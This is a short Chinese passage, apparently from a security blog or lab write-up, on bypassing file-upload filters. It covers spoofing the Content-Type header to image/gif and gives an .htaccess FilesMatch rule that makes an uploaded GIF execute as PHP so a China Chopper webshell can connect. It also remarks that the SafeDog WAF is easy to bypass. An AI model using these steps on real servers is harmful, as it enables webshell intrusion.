6.文件流类型

不管怎么动后缀都不行,复制到Content-Type到百度

image/gif替换Content-Type后面的内容

7.文件重写
我个人觉得最有意思的就是这个了,

要求正常链接菜刀,好可怕。
直接传个gif,再传个文件

代码:
<FilesMatch "95zz.gif">
SetHandler application/x-httpd-php
</FilesMatch>
这里去访问就能看到已经解析了。(不是访问文件,而是gif)
先放着,明年再来更新
(最新安全狗这些绕过简直轻轻松松的,欢迎提供靶场)